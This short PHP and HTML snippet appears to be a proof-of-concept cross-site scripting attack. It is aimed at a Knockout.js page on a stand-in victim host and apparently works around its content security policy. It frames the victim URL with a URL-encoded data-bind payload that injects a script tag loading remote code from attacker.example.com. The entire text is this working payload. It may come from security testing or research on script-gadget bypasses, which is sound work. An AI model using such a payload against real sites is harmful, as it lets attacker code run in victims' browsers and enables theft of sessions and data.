<iframe src="http://victim.example.com/repo/csp/sd/knockout.php?inj=<?php
$payload = <<<'PAYLOAD'
<div data-bind="html:'<script src=&quot;//attacker.example.com/shout/&quot;></script>'"></div>
PAYLOAD;
echo rawurlencode($payload);
?>
"<iframe>